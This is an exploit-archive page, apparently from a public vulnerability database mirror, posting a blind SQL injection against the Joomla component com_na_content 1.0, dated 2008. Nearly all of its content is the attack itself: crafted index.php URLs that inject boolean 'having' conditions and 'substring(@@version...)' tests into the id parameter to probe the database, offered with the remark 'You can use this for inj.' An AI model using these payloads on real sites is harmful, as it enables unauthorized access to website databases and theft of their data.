[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_na_content 1.0 Blind SQL Injection Vulnerability
# Published : 2008-12-29
# Author : xoron
# Previous Title : CMS NetCat 3.0/3.12 Blind SQL Injection Exploit
# Next Title : Sepcity Classified (classdis.asp ID) SQL Injection Vulnerability


Joomla Component com_na_content 1.0 Blind SQL Injection Vuln

Author: xoron

Exploit: /index.php?option=com_na_content&task=view&id=1 having 1=0
            /index.php?option=com_na_content&task=view&id=1 having 1=1
or

            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=4
            /index.php?option=com_na_content&task=view&id=1 and substring(@@version,1,1)=5

!! You can use this for inj.
!! Thans for Ozan!

# www.Syue.com [2008-12-29]